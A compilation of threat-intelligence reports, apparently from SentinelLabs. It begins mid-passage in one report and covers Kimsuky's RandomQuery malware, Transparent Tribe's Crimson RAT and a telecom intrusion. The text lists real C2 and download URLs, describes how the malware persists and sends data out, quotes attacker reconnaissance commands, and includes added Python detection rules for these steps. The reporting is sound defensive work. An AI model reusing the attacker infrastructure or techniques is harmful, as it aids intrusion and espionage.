Workingprofstatus https[://]ams3.digitaloceanspaces[.]com/workingprofstatus/anime.cdr

In mid 2022, the threat group experimented with using lesser-known file hosting providers, and in one case Dropbox. One provider that became increasingly popular was Timeweb, the Russian IaaS provider.

Moving into 2023, the threat group shifted from primarily using DigitalOcean Spaces to Timeweb for malware hosting and C2. Today, the actor continues to use Timeweb Cloud S3 object storage similar to how DigitalOcean was abused. Note that limited Timeweb use overlapped with DigitalOcean use since mid 2022; however, the change appears more strategic since the start of 2023. The shift away from DigitalOcean was due to increased difficulty in hosting the malware without campaign disruption.

Following this design change, a new cluster of activity can be built and linked to the same actor. The cluster makes use of new C2 servers, Timeweb Cloud malware hosting locations, and of course malware samples.

Example map of Timeweb Infrastructure use (list in IOC section)

One associated server stuck out as unique โ€“ 193.218.204[.]207, which is on AS211180 for OKLAKO. Of note, the server has open directories showing a file structure and provides us some insight into backend server design and a small number of victim hosts.

Decoded configuration file

Further clues point to Brazilian-Portuguese-speaking threat actors, such as mdfiles.php returning ARQUIVO ENVIADO! (FILE SENT!) to beaconing hosts. Additionally, the publicly available file (SHA1: dff84020be1f4691bed628d300df8a8b12a4de7e) contains Base64 data, which can be decoded to show the configuration file set to beacon to 193.218.204[.]207 while also containing Brazilian-Portuguese text for VARIABLE IS OK and UPDATE.

Decoded configuration file

Conclusion

Operation Magalenha indicates the persistent nature of the Brazilian threat actors. These groups represent an evolving threat to organizations and individuals in their target countries and have demonstrated a consistent capacity to update their malware arsenal and tactics, allowing them to remain effective in their campaigns.

Their capacity to orchestrate attacks in Portuguese- and Spanish-speaking countries in Europe, Central, and Latin America suggests an understanding of the local financial landscape and a willingness to invest time and resources in developing targeted campaigns. As such, it is important for organizations and individuals to remain vigilant and take proactive measures to protect themselves from this threat.

Indicators of Compromise

Below is a list of shortened URLs, SHA1 hashes (of scripts, archive files, and malware samples), and URLs (malware hosting and C2 server locations) associated with Operation Magalenha and related activities conducted by the threat group behind the operation dating back to 2022.

Shortened URLs

https[://]tinyurl.com/edpmobilecliente
https[://]tinyurl.com/dashboaraudicaofastaccoun
https[://]tinyurl.com/edpareaparticulares
https[://]tinyurl.com/miareapersonal



Kimsuky | Ongoing Campaign Using Tailored Reconnaissance Toolkit

23 May 2023 at 11:23

By Aleksandar Milenkoski and Tom Hegel

Executive Summary

  • SentinelLabs has observed an ongoing campaign by Kimsuky, a North Korean APT group, targeting North Korea-focused information services, human rights activists, and DPRK-defector support organizations.
  • The campaign focuses on file reconnaissance and information exfiltration using a variant of the RandomQuery malware, enabling subsequent precision attacks.
  • Kimsuky distributes RandomQuery using Microsoft Compiled HTML Help (CHM) files, the groupโ€™s long-running tactic for delivering diverse sets of malware.
  • Kimsuky strategically employs new TLDs and domain names for malicious infrastructure, mimicking standard .com TLDs to deceive unsuspecting targets and network defenders.

Overview

SentinelLabs has been tracking a targeted campaign against information services, as well as organizations supporting human rights activists and defectors in relation to North Korea. The campaign focuses on file reconnaissance, and exfiltrating system and hardware information, laying the groundwork for subsequent precision attacks. Based on the infrastructure used, malware delivery methods, and malware implementation, we assess with high confidence that the campaign has been orchestrated by the Kimsuky threat actor.

Kimsuky is a suspected North Korean advanced persistent threat (APT) group known for targeting organizations and individuals on a global scale. Active since at least 2012, the group regularly engages in targeted phishing and social engineering campaigns to collect intelligence and gain unauthorized access to sensitive information, aligning with the interests of the North Korean government.

Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks. For example, we recently revealed the groupโ€™s distribution of ReconShark through macro-enabled Office documents.

The campaign we discuss in this post indicates a shift towards using a variant of the RandomQuery malware that has the single objective of file enumeration and information exfiltration. This stands in contrast to recently observed RandomQuery variants supporting a wider array of features, such as keylogging and execution of further specialized malware.

RandomQuery is a constant staple in Kimsukyโ€™s arsenal and comes in various flavors. This campaign specifically uses a VBScript-only implementation. The malwareโ€™s ability to exfiltrate valuable information, such as hardware, operating system, and file details, indicates its pivotal role in Kimsukyโ€™s reconnaissance operations for enabling tailored attacks.

This campaign also demonstrates the group's consistent use of CHM files to deliver malware, a vector it has previously used for keyloggers and clipboard-stealing malware. In line with this modus operandi, Kimsuky distributes the RandomQuery variant we observed through CHM files.

Finally, this campaign highlights Kimsukyโ€™s recent extensive use of less common top-level domains (TLDs) for their infrastructure, such as .space, .asia, .click, and .online. The group also uses domain names that mimic standard .com TLDs, aiming to appear legitimate.

Initial Targeting

Kimsuky makes use of specially crafted phishing emails to deploy RandomQuery. The phishing emails are sent to targets from an account registered at the South Korean email provider Daum, a standard Kimsuky phishing practice. Recent sender email addresses include bandi00413[@]daum.net.

The phishing emails, written in Korean, request the recipient to review an attached document claiming to be authored by Lee Kwang-baek, the CEO of Daily NK. Daily NK is a prominent South Korean online news outlet that provides independent reporting on North Korea, making them a prime organization for impersonation by DPRK threat actors looking to appear legitimate.

Kimsuky phishing email (in Korean)

The attached document is a CHM file stored in a password-protected archive. Aligning with the targeting focus of Kimsuky in this campaign, the lure document is entitled โ€œDifficulties in activities of North Korean human rights organizations and measures to vitalize themโ€ and presents a catalog of challenges pertaining to human rights organizations.

Lure document snippet (in Korean)

Consistent with known Kimsuky tactics, the CHM file contains a malicious Shortcut object that activates on the Click event. The object:

  • Creates a Base-64 encoded file in the %USERPROFILE%\Links\ directory, such as mini.dat.
  • Decodes the file using the certutil utility, creating a VB script, and then stores the script in a separate file, such as %USERPROFILE%\Links\mini.vbs.
  • Establishes persistence by editing the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key, such that the newly created VB script is executed at system startup.
Shortcut object

The VB script issues an HTTP GET request to a C2 server URL, for example http[://]file.com-port.space/indeed/show[.]php?query=50, and executes the second-stage payload returned by the server. Based on overlaps with code documented in previous work, we assess that the second-stage payload is a VBScript RandomQuery variant.

Execution of a RandomQuery variant
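The chain described above maps directly onto host telemetry. The following Python is an added example written for this article, not code from the SentinelLabs post or from the malware: it evaluates constructed Sysmon-style process-creation and registry events against the four stages (hh.exe opening a CHM, certutil -decode of a file under %USERPROFILE%\Links, a Run value pointing at a .vbs, and a script host running that .vbs from Links) and only reports a host where the decode and the persistence stages co-occur. The event field names, the sample file names (mini.dat and mini.vbs mirror the post) and the Run value data are assumptions.

```python
import re
from collections import defaultdict

# Constructed events in a Sysmon-like shape (EventID 1 = process creation,
# EventID 13 = registry value set). File and value names are assumptions
# modelled on the post, not telemetry from the campaign.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "image": r"C:\Windows\hh.exe",
     "cmd": r'"C:\Windows\hh.exe" C:\Users\jdoe\Downloads\report.chm'},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -decode C:\Users\jdoe\Links\mini.dat C:\Users\jdoe\Links\mini.vbs"},
    {"id": 13, "host": "WS01",
     "target": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mini",
     "details": r"wscript.exe //B C:\Users\jdoe\Links\mini.vbs"},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r"wscript.exe //B C:\Users\jdoe\Links\mini.vbs"},
    # Benign certutil use on another host: decoding an exported certificate.
    {"id": 1, "host": "WS02", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -decode C:\Temp\cert.b64 C:\Temp\cert.cer"},
]

CERTUTIL_DECODE = re.compile(r"certutil(?:\.exe)?.*?-decode\s+(\S+)\s+(\S+)", re.I)
USER_LINKS = re.compile(r"\\Users\\[^\\]+\\Links\\", re.I)
SCRIPT_HOST = re.compile(r"\\[wc]script\.exe$", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
VBS_FILE = re.compile(r"\S+\.vbs\b", re.I)


def evaluate(event):
    """Return the chain stages a single event matches (empty list if none)."""
    hits = []
    if event["id"] == 1:
        image, cmd = event["image"], event["cmd"]
        # Stage 1: a CHM is opened with the HTML Help viewer.
        if image.lower().endswith("\\hh.exe") and ".chm" in cmd.lower():
            hits.append("chm_opened")
        # Stage 2: certutil decodes a Base64 file under %USERPROFILE%\Links into a script.
        m = CERTUTIL_DECODE.search(cmd)
        if m and (USER_LINKS.search(m.group(1)) or VBS_FILE.search(m.group(2))):
            hits.append("certutil_decode_to_script")
        # Stage 4: a script host runs the decoded .vbs from the Links directory.
        if SCRIPT_HOST.search(image) and USER_LINKS.search(cmd) and VBS_FILE.search(cmd):
            hits.append("script_run_from_links")
    elif event["id"] == 13:
        # Stage 3: a Run value points at a .vbs file.
        if RUN_KEY.search(event["target"]) and VBS_FILE.search(event["details"]):
            hits.append("run_key_vbs_persistence")
    return hits


def correlate(events, required=("certutil_decode_to_script", "run_key_vbs_persistence")):
    """Group stage hits per host and report hosts where the required stages co-occur.
    Stages that are noisy on their own (hh.exe, certutil) become evidence once paired
    with persistence on the same host."""
    stages = defaultdict(set)
    for ev in events:
        stages[ev["host"]].update(evaluate(ev))
    return {host: sorted(s) for host, s in stages.items() if set(required) <= s}


if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

Requiring two stages on the same host keeps isolated certutil -decode activity, which is common in administration scripts, from raising an alert, while a decode into the Links directory paired with a Run value pointing at the result is specific enough to act on.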

Dissecting RandomQuery

The RandomQuery variant that Kimsuky distributes first configures the Internet Explorer browser by editing registry values under HKCU\Software\Microsoft\Internet Explorer\Main:

  • Sets Check_Associations to no: The system does not issue a notification if Internet Explorer is not the default web browser.
  • Sets DisableFirstRunCustomize to 1: Prevents Internet Explorer from running the First Run wizard the first time a user starts the browser.

RandomQuery also sets the registry value HKCU\Software\Microsoft\Edge\IEToEdge\RedirectionMode to 0, which stops Internet Explorer from redirecting to the Microsoft Edge browser.

RandomQuery configures Internet Explorer

These Internet Explorer configurations enable the uninterrupted use of the browser by RandomQuery, whose earlier variants are known to use the InternetExplorer.Application object when communicating with C2 servers. However, the RandomQuery variant we analyzed does not use this object, but leverages Microsoft.XMLHTTP for this purpose.

RandomQuery then proceeds to gather and exfiltrate information about the infected platform, structured into three classes that the malware refers to as Basic System, Specific Folder, and Process List.

The malware first gathers system and hardware information using the Win32_ComputerSystem, Win32_OperatingSystem, and Win32_Processor WMI classes, such as: computer name, processor speed, OS version, and the amount of physical memory available to the system. RandomQuery refers to this information as Basic System information.

RandomQuery gathers Basic System information

RandomQuery then enumerates subdirectories and files within particular directories, which it specifies by their ID numbers in the Windows ShellSpecialFolderConstants enumeration:

  • Desktop (ID 0)
  • Documents (ID 5; for example, C:\Users\[username]\Documents)
  • Favorites (ID 6; for example, C:\Documents and Settings\[username]\Favorites)
  • Recent (ID 8; for example, C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Recent)
  • Program Files (ID 38; for example, C:\Program Files)
  • Program Files (x86) (ID 42; for example, C:\Program Files (x86) on 64-bit platforms)
  • %USERPROFILE%\Downloads (ID 40; for example, C:\Users\[username]\Downloads)

The malware refers to this information as Specific Folder information: It provides the attackers with a wealth of user- and platform-related information, such as installed applications, user document details, and frequented websites.

RandomQuery gathers Specific Folder information

RandomQuery also enumerates the process and session IDs of running processes using the Win32_Process WMI class. The malware refers to this information as Process List information.

RandomQuery gathers Process List information

To exfiltrate the gathered information, RandomQuery first Base64-encodes it, and then constructs and issues an HTTP POST request containing the information to a C2 server URL (for example, http[://]file.com-port.space/indeed/show[.]php?query=97). We observed that the C2 URLs RandomQuery uses for exfiltration overlap with the URLs from which RandomQuery itself is downloaded, with a difference in the value of the query parameter.

RandomQuery exfiltrates information

The variants we analyzed use c2xkanZvaXU4OTA as a boundary string separating header values from the exfiltrated information stored in the POST request. Pivoting on this string enabled us to identify additional RandomQuery variants used by Kimsuky in the past. This is a further indication of the threat group consistently using this malware in its targeted campaigns.
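As an added example (not code from the post or from the malware), the following Python shows how a network-side check can pivot on the boundary string and the C2 URL shape, and how an analyst can pull the Base64 payload out of a captured POST for review. The request below is constructed: its URL follows the form quoted above, but the multipart layout and the decoded content are assumptions of this example; the exact body format RandomQuery produces is not documented here.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Boundary string the post reports for the RandomQuery variants.
BOUNDARY = "c2xkanZvaXU4OTA"
C2_PATH = re.compile(r"/show\.php$", re.I)

# Constructed request. The URL shape matches the post; the multipart layout and the
# decoded content are assumptions made for this example.
SAMPLE_REQUEST = {
    "method": "POST",
    "url": "http://file.com-port.space/indeed/show.php?query=97",
    "headers": {"Content-Type": "multipart/form-data; boundary=" + BOUNDARY},
    "body": (
        "--" + BOUNDARY + "\r\n"
        'Content-Disposition: form-data; name="data"\r\n\r\n'
        + base64.b64encode(
            b"[Basic System]\nComputerName=WS01\nOSVersion=10.0.19045\n"
            b"[Process List]\nlsass.exe 712 0\n"
        ).decode("ascii")
        + "\r\n--" + BOUNDARY + "--\r\n"
    ),
}


def query_value(req):
    """The numeric 'query' parameter, which differs between download and exfil URLs."""
    q = parse_qs(urlsplit(req["url"]).query).get("query", [])
    return int(q[0]) if q and q[0].isdigit() else None


def is_randomquery_exfil(req):
    """The boundary string is the strong signal; the C2 path shape is supporting evidence."""
    if req["method"].upper() != "POST":
        return False
    content_type = req["headers"].get("Content-Type", "")
    boundary_hit = BOUNDARY in content_type or BOUNDARY in req["body"]
    path_hit = bool(C2_PATH.search(urlsplit(req["url"]).path)) and query_value(req) is not None
    return boundary_hit or path_hit


def extract_payload(req):
    """Decode the Base64 part between the boundary markers; None if nothing decodes."""
    for part in req["body"].split("--" + BOUNDARY):
        if "\r\n\r\n" not in part:
            continue  # preamble, or the closing '--' marker
        _part_headers, content = part.split("\r\n\r\n", 1)
        try:
            return base64.b64decode(content.strip(), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
    return None
```

The boundary string is a literal the operators have reused across variants, which is why it pivots so well; the path and query shape alone would also match unrelated PHP endpoints, so it is only treated as corroboration.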

These variants differ to varying extents from those observed in Kimsuky's latest campaign, in features such as enumeration of deployed security products, a focus on Microsoft Word documents when enumerating files, and execution of additional malicious code. Kimsuky continuously adapts its RandomQuery arsenal to the task at hand; the current iteration focuses on information exfiltration and file reconnaissance.

Infrastructure

Kimsuky has made extensive use of less common TLDs during their malicious domain registration process. In our recent reporting on Kimsukyโ€™s ReconShark activity, we noted multiple clusters of malicious domains which made use of the same technique.

This latest campaign is tied to infrastructure abusing the .space, .asia, .click, and .online TLDs, combined with domain names that mimic standard .com domains. Noteworthy examples include com-def[.]asia, com-www[.]click, and com-otp[.]click. Placed in a full URL path (file.com-port.space/...), such a name reads at a glance like a subdomain of a .com site, and an average user is less likely to spot it as suspicious.
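An added example, not from the post: a scoring heuristic in Python for the naming pattern described above, run over the indicator domains listed at the end of this article. The set of uncommon TLDs is the one the post names; the set of TLD-like prefixes is an assumption of the example and can be widened.

```python
import re

# TLDs the post names for this campaign's infrastructure.
UNCOMMON_TLDS = {"space", "click", "asia", "online"}
# Labels that read as a real TLD when they sit in front of a hyphen; an assumption of
# this example, extend it with the ccTLDs your users expect to see.
TLD_LIKE_LABELS = {"com", "net", "org", "kr", "de", "cf", "jp", "uk", "us", "co", "io"}
# Indicator domains from the list at the end of this article.
CAMPAIGN_DOMAINS = [
    "com-port.space", "com-pow.click", "com-def.asia", "com-www.click",
    "com-otp.click", "com-price.space", "de-file.online", "com-people.click",
    "kr-angry.click", "kr-me.click", "cf-health.click", "com-hwp.space",
    "com-view.online", "com-in.asia", "ko-asia.click", "db-online.space",
]
HYPHENATED_SLD = re.compile(r"^([a-z0-9]{2,3})-[a-z0-9-]+$")


def score_domain(host):
    """2: prefix is a real TLD on an uncommon TLD (com-port.space)
    1: any short hyphenated prefix on an uncommon TLD (db-online.space)
    0: not matched by this heuristic"""
    labels = host.lower().strip(".").split(".")
    if len(labels) < 2:
        return 0
    sld, tld = labels[-2], labels[-1]          # registrable part, ignoring subdomains
    if tld not in UNCOMMON_TLDS:
        return 0
    m = HYPHENATED_SLD.match(sld)
    if not m:
        return 0
    return 2 if m.group(1) in TLD_LIKE_LABELS else 1


def triage(hosts):
    """Map each scoring host to its score, for feeding a watchlist or a hunt query."""
    return {h: score_domain(h) for h in hosts if score_domain(h)}
```

Fourteen of the sixteen indicators score 2 because their prefix is a real TLD (com, kr, de, cf); ko-asia[.]click and db-online[.]space only score 1 because ko and db are not TLDs. A score of 1 will also hit legitimate hyphenated names such as my-site.online, so treat it as a hunting lead rather than a blocking signal.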

Campaign-related domain registration timeline

For this latest campaign, the threat actor used the Japan-based domain registration service Onamae for primary malicious domain purchasing. This particular cluster of activity began on May 5th 2023, and continues as of this report. ABLENET VPS Hosting is used by the actor following domain registration.

Conclusion

We continue to closely monitor the persistent attacks carried out by Kimsuky and its continuously advancing attack toolkit. These incidents underscore the ever-changing landscape of North Korean threat groups, whose remit not only encompasses political espionage but also sabotage and financial threats.

It is imperative for organizations to familiarize themselves with the TTPs employed by suspected North Korean state-sponsored APTs and to adopt appropriate measures to safeguard against such attacks. The correlation between recent malicious activities and a broader range of previously undisclosed operations attributed to North Korea emphasizes the importance of maintaining a state of constant alertness and fostering collaborative efforts.

Indicators of Compromise

SHA1 Hashes

96d29a2d554b36d6fb7373ae52765850c17b68df
84398dcd52348eec37738b27af9682a3a1a08492
912f875899dd989fbfd64b515060f271546ef94c
49c70c292a634e822300c57305698b56c6275b1c
8f2e6719ce0f29c2c6dbabe5a7bda5906a99481c
0288140be88bc3156b692db2516e38f1f2e3f494

Domains

com-port[.]space
com-pow[.]click
com-def[.]asia
com-www[.]click
com-otp[.]click
com-price[.]space
de-file[.]online
com-people[.]click
kr-angry[.]click
kr-me[.]click
cf-health[.]click
com-hwp[.]space
com-view[.]online
com-in[.]asia
ko-asia[.]click
db-online[.]space

Transparent Tribe (APT36) | Pakistan-Aligned Threat Actor Expands Interest in Indian Education Sector

13 April 2023 at 09:55

Executive Summary

  • SentinelLabs has been tracking a cluster of malicious documents that stage Crimson RAT, distributed by APT36 (Transparent Tribe).
  • We assess that this activity is part of the groupโ€™s previously reported targeting of the education sector in the Indian subcontinent.
  • We observed APT36 introducing OLE embedding to its typically used techniques for staging malware from lure documents and versioned changes to the implementation of Crimson RAT, indicating the ongoing evolution of APT36โ€™s tactics and malware arsenal.

Overview

SentinelLabs has been tracking a recently disclosed cluster of malicious Office documents that distribute Crimson RAT, used by the APT36 group (also known as Transparent Tribe) to target the education sector. This post summarizes our observations, highlighting the group's continuous changes to its malware staging techniques and Crimson RAT implementations.

Transparent Tribe is a suspected Pakistan-based threat group active since at least 2013. The group is not very sophisticated; however, it is a highly persistent threat actor that continuously adapts its operational strategy. Transparent Tribe has previously focused mainly on Indian military and government personnel, but it has recently expanded its scope to include educational institutions and students in the Indian subcontinent. Crimson RAT is a consistent staple of the malware arsenal the group uses in its campaigns.

The names and content of the lure documents, the associated domains, and the use of Crimson RAT suggest that the activities discussed in this post are part of a previously reported broader targeting of the education sector by Transparent Tribe.

Further, the PDB paths of some Crimson RAT samples we analyzed contain the word Wibemax, which is also contained in the PDB paths of Crimson RAT payloads observed in a previous Transparent Tribe campaign.

Wibemax matches the name of a Pakistani software development company, but at this time we have not identified a clear relationship to the adversary.

It is worth noting that there are high confidence assessments of Transparent Tribe leveraging third parties to support their operation, such as the Pakistani web hosting provider Zain Hosting.

Our analysis reinforces the assessment that closely monitoring the research activities of rival nations has become an important objective for Transparent Tribe, in keeping with the goals of the authorities whose interests the group serves.

Malicious Documents

The documents that Transparent Tribe distributes have education-themed content and names such as assignment or Assignment-no-10, and indicate creation dates of July and August 2022. Based on known behavior of this group, we suspect that the documents have been distributed to targets as attachments to phishing emails. Consistent with known Transparent Tribe tactics, we observed that some of the documents have been hosted on file hosting services and attacker-created domains, such as s1.fileditch[.]ch, cloud-drive[.]store, and drive-phone[.]online.

It is important to note that cloud-drive[.]store and drive-phone[.]online have been previously linked to Transparent Tribe activities targeting the education sector and assessed as domains prepared for future use. Further, drive-phone[.]online closely resembles the phone-drive[.]online domain recently observed hosting Transparent Tribe malware targeting Indian and Pakistani Android users.

The malicious documents we analyzed stage Crimson RAT using Microsoft Office macros or OLE embedding.

The macro code executes when the documents are opened, and its functionality is consistent with known Transparent Tribe macro variants. The macros create and decompress an embedded archive file in the %ALLUSERSPROFILE% directory (C:\ProgramData) and execute the Crimson RAT payload within. Some macros insert text in the document, which is typically education-themed content relating to India.

Macro implementation
Macro-inserted document text

In addition to macros, we observed that Transparent Tribe have adopted OLE embedding as a technique to stage Crimson RAT. Malicious documents that implement this technique require users to double-click a document element. The documents distributed by Transparent Tribe typically display an image (a โ€œView Documentโ€ graphic) indicating that the document content is locked. This lures users to double-click the graphic to view the content, which activates an OLE package that stores and executes Crimson RAT masquerading as an update process (MicrosoftUpdate.exe).

The "View Document" graphic
OLE stream that stores Crimson RAT

Transparent Tribe is known to experiment with different malware staging techniques, which include distributing executables with embedded documents or documents that execute designated Crimson RAT loaders. The adoption of OLE embedding further highlights the groupโ€™s continuous experimentation with malware staging techniques.
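The two staging paths above (a macro writing an archive to C:\ProgramData and running the payload inside it; an OLE package extracting and running MicrosoftUpdate.exe) share one observable: an Office process spawning an executable from a user-writable drop directory. As an added example, not the post's or the group's code, the Python below flags that lineage on constructed process-creation events. Treating the AppData paths as OLE extraction locations, and every file name and path in the sample data, are assumptions of the example.

```python
import re

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# The macro variants drop into %ALLUSERSPROFILE% (C:\ProgramData) per the post; the
# user-profile AppData paths are added as the usual landing place for a file extracted
# from an OLE package (an assumption of this example).
DROP_DIRS = re.compile(r"^c:\\(programdata|users\\[^\\]+\\appdata\\(local|roaming))\\", re.I)
WINDOWS_DIR = re.compile(r"^c:\\windows\\", re.I)
MASQUERADE_NAMES = {"microsoftupdate.exe"}

# Constructed process-creation events; paths and file names are made up for the example.
SAMPLE_EVENTS = [
    {"host": "LAB1", "pid": 410, "ppid": 300, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"host": "LAB1", "pid": 411, "ppid": 410, "image": r"C:\ProgramData\Sample\payload.exe"},
    {"host": "LAB2", "pid": 520, "ppid": 500, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"host": "LAB2", "pid": 521, "ppid": 520, "image": r"C:\Users\amit\AppData\Local\Temp\MicrosoftUpdate.exe"},
    {"host": "LAB3", "pid": 630, "ppid": 600, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"host": "LAB3", "pid": 631, "ppid": 630, "image": r"C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_office_staging(events):
    """Return (host, child image, reasons) for executables spawned by an Office host
    from a drop directory or under a name that imitates a Windows updater."""
    by_pid = {(e["host"], e["pid"]): e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get((e["host"], e["ppid"]))
        if parent is None or basename(parent["image"]) not in OFFICE_HOSTS:
            continue
        reasons = []
        if DROP_DIRS.match(e["image"]):
            reasons.append("office_child_from_drop_dir")
        if basename(e["image"]) in MASQUERADE_NAMES and not WINDOWS_DIR.match(e["image"]):
            reasons.append("office_child_masquerades_as_updater")
        if reasons:
            findings.append((e["host"], e["image"], reasons))
    return findings
```

Keying on the parent rather than on macro-specific artefacts is what makes the rule survive the group's switch from macros to OLE embedding: both end with Word starting something it wrote to disk moments earlier.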

Crimson RAT Implementations

We observed a variety of Crimson RAT .NET implementations, with compilation timestamps between July and September 2022. The Crimson RAT payloads we analyzed use the richa-sharma.ddns[.]net domain for C2 purposes and support either 40 or 65 commands, most of which have been documented in previous research. Features of Crimson RAT include exfiltrating system information, capturing screenshots, starting and stopping processes, and enumerating files and drives.

A Crimson RAT command dispatch routine

Some Crimson RAT variants are stripped of debug information, whereas others have PDB paths that contain a date stamp, the word Richa, which relates to the configured C2 domain, and the word Wibemax. Portions of these PDB paths overlap those of Crimson RAT payloads observed in a previous Transparent Tribe campaign, such as D:\Projects\Wibemax\WinP\WinP\obj\Debug\WinP.pdb and D:\Projects\Wibemax\Windows RAT\1 Windows 10 Client\Win8P-Sunny\2022-04-15-Win8P Sunny\obj\Debug\FUJIKBattery.pdb.

Crimson RAT PDB paths

We observed different Crimson RAT version identifiers: R.S.8.8., R.S.8.9, R.S.8.1, and R.S.8.6. We speculate that the R.S. components of the identifiers may relate to the configured C2 domain (richa-sharma.ddns[.]net) and the numerical components may specify a version (build) number. This aligns with a documented Crimson RAT variant with the identifier S.L.2.2., which has used the sunnyleone.hopto[.]org domain for C2 purposes.

As an anti-analysis measure, Crimson RAT variants delay their execution for a fixed period, for example 61, 180, or 241 seconds. Most of the variants we analyzed check whether they are running on a machine named G551JW or DESKTOP-B83U7C5 and establish persistence by creating a registry entry under \SOFTWARE\Microsoft\Windows\CurrentVersion\Run only if the machine name differs. G551JW and DESKTOP-B83U7C5 may be the names of machines on which the Crimson RAT developers run test executions.

Crimson RAT variants implement different obfuscation techniques of varying intensities, for example, simple function name malformation and dynamic string resolution. We observed the use of the Eazfuscator obfuscator in a Crimson RAT sample named NewOrleans. Evidence suggests that the Crimson RAT developers have patched the routine that evaluates the trial period of Eazfuscator to enable the execution of the malware after the trial period expires.

Eazfuscator trial period evaluation in NewOrleans
Eazfuscator trial expiry message

With previous variants of Crimson RAT obfuscated using Crypto Obfuscator, the addition of Eazfuscator to the obfuscation techniques used by Transparent Tribe highlights the continuous maintenance and development of the RAT.

Conclusion

Transparent Tribe is a highly motivated and persistent threat actor that regularly updates its malware arsenal, operational playbook, and targets. Our analysis further demonstrates this characteristic of the group by spotlighting the adoption of OLE embedding as a technique for staging malware from lure documents and the Eazfuscator obfuscator to protect Crimson RAT implementations. Transparent Tribeโ€™s constantly changing operational and targeting strategies require constant vigilance to mitigate the threat posed by the group.

Indicators of Compromise

SHA1 Description
738d31ceca78ffd053403d3b2bc15847682899a0 Malicious document
9ed39c6a3faab057e6c962f0b2aaab07728c5555 Malicious document
af6608755e2708335dc80961a9e634f870aecf3c Malicious document
e000596ad65b2427d7af3313e5748c2e7f37fba7 Malicious document
fd46411b315beb36926877e4b021721fcd111d7a Malicious document
516db7998e3bf46858352697c1f103ef456f2e8e Crimson RAT
842f55579db786e46b20f7a7053861170e1c0c5e Crimson RAT
87e0ea08713a746d53bef7fb04632bfcd6717fa9 Crimson RAT
911226d78918b303df5110704a8c8bb599bcd403 Crimson RAT
973cb3afc7eb47801ff5d2487d2734ada6b4056f Crimson RAT

Domain Description
richa-sharma.ddns[.]net C2 server
cloud-drive[.]store Malware hosting location
drive-phone[.]online Malware hosting location
s1.fileditch[.]ch Malware hosting location

Operation Tainted Love | Chinese APTs Target Telcos in New Attacks

23 March 2023 at 09:53

By Aleksandar Milenkoski, Juan Andres Guerrero-Saade, and Joey Chen, in collaboration with QGroup

Executive Summary

  • In Q1 of 2023, SentinelLabs observed initial phases of attacks against telecommunication providers in the Middle East.
  • We assess that this activity represents an evolution of tooling associated with Operation Soft Cell.
  • While it is highly likely that the threat actor is a Chinese cyberespionage group in the nexus of Gallium and APT41, the exact grouping remains unclear.
  • SentinelLabs observed the use of a well-maintained, versioned credential theft capability and a new dropper mechanism indicative of an ongoing development effort by a highly-motivated threat actor with specific tasking requirements.

Overview

In collaboration with QGroup GmbH, SentinelLabs recently observed initial threat activities targeting the telecommunication sector. We assess it is highly likely that these attacks were conducted by a Chinese cyberespionage actor related to the Operation Soft Cell campaign.

The initial attack phase involves infiltrating Internet-facing Microsoft Exchange servers to deploy webshells used for command execution. Once a foothold is established, the attackers conduct a variety of reconnaissance, credential theft, lateral movement, and data exfiltration activities.

The deployment of custom credential theft malware is central to this new campaign. The malware is closed-source tooling built around a series of modifications to Mimikatz. This post details the multi-component architecture and functionality of a sample, referred to as mim221.

We assess that mim221 is a recent version of an actively maintained credential theft capability upgraded with new anti-detection features. The use of special-purpose modules that implement a range of advanced techniques shows the threat actorsโ€™ dedication to advancing its toolset towards maximum stealth. These techniques include

  • in-memory mapping of malicious images to evade EDR API hooks and file-based detections
  • surgically terminating Event Log threads instead of the host process to inhibit logging without raising suspicions
  • staging a credential theft capability in the LSASS process itself by abusing native Windows capabilities.

Version numbers and build timestamps indicate a maintained software project by designated developers. Closer analysis reveals an element of pragmatism in that the threat actors use modified publicly available code to achieve their goals.

In terms of attribution, the tooling suggests an immediate link to the โ€˜Operation Soft Cellโ€™ campaign but remains slightly vague on the specific threat actor. That campaign has been publicly associated with Gallium and possible connections to APT41 have been suggested by the use of a common code signing certificate and tooling that shares code similarities. APT41 is also known to target telecommunication providers.

Given previous target and TTP overlaps, and an evident familiarity with victim environments, we assess with medium-confidence that Gallium is involved. However, we also recognize the possibility of closed-source tool-sharing between Chinese state-sponsored threat actors, and the possibility of a shared vendor or digital quartermaster.

Regardless of clustering specifics, this finding highlights the increased operational tempo of Chinese cyberespionage actors and their consistent investment in advancing their malware arsenal to evade detection.

Infection Vector and Initial TTPs

As initial attack indicators, we observed command execution through webshells on compromised Microsoft Exchange server deployments. The threat actors used C:\MS_DATA as their main working directory for storing malware and staging data for exfiltration. Noting that the Microsoft TroubleShootingScript toolset (TSSv2) uses C:\MS_DATA for storing log files, we suspect that its use as a working directory is an attempt to make malicious file system activities look legitimate.

After establishing an initial foothold, the threat actor conducts reconnaissance like querying user and network information using a variety of tools. For example, the attackers used dsquery and query to obtain information about Active Directory objects, including user information, and Remote Desktop user sessions. They also used the Local Group (LG) tool to enumerate all local groups and members in a domain.

    "cmd"  /c cd /d C:\MS_DATA\&dsquery * -limit 0 -filter
    "cmd"  /c cd /d C:\MS_DATA\&dsquery * -limit 0 -filter "&(objectClass=User)(objectCategory=Person)" -attr objectSID sAMAccountName displayName mail memberOf >da.back&cd
